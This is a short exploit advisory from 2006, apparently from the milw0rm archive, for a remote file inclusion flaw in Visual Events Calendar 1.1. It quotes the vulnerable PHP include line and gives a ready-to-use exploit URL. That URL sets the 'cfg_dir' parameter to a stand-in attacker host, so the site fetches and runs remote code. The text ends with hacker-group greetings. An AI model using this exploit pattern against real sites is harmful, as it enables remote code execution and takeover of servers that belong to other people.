Visual Events Calendar 1.1 - 'cfg_dir' Remote File Inclusion
#title: Visual Events Calendar v1.1 (cfg_dir) Remote Inclusion Vulnerability
#Author: xoron
#script: Visual Events Calendar v1.1
#Class : Remote
#cont@ct: x0r0n[at]hotmail[dot]com
#CODE: include $cfg_dir."customize_text.php";
#Exploit: http://www.site.com/[path]/calendar.php?cfg_dir=http://evil_scripts?
#Thanx : WWW.CYBER-WARRiOR.ORG
#Greetz: str0ke, ShiKaA , DJR , x-mastER ,R3D4c!D ,
# milw0rm.com [2006-08-07]